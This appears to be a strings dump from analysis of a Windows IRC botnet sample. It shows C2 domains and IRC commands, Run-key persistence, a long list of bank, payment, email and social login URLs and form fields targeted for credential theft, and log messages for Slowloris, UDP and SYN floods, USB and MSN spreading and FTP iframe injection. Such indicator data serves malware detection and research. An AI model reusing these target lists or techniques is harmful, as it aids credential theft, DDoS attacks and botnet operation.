%S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\explorer.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe</pre><b>wmiprvse.exe_3704_rwx_00D80000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%System%\wbem\wmiprvse.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Upwiwc.exe</pre><pre>7 767<7><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\system32\wbem\wmiprvse.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe</pre></7></pre></7></pre></7></pre></7></pre></7></pre></7></pre></7></pre></7></pre></7></pre></7></pre></7></pre></7></pre></7></pre></7></pre></7></pre></7></pre></7></pre></7></pre></7></pre></7></pre></7></pre></7></pre></7></pre></7>